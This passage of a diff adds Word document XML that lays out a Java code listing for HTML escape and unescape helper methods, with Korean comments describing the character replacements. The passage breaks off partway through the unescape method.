+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>if (value == null) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>return null;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">String </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>trustValue</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = StringEscapeUtils.escapeHtml4(value); // &amp;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>lt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>;, &amp;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>gt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>;, &amp;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>quot</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>; 문자 치환</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">Matcher </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>matcher</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>escapePattern.matcher</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>trustValue</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>if (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>matcher.find</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>()) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">return </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>matcher.replaceAll</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>("&amp;#39"); // &amp;#39 치환</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">return </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>trustValue</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">public static String </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:b/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>unescape</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>(String value) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">Pattern </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>unescapePattern</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>Pattern.compile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>("&amp;#39;");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>if (value == null) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>return null;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">String </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>originalValue</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = StringEscapeUtils.unescapeHtml4(value); // &lt;, &gt;, " 치환</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">Matcher </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>matcher</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>unescapePattern.matcher</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>originalValue</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>if (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>matcher.find</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>()) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">return </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>matcher.replaceAll</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">("'"); // </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
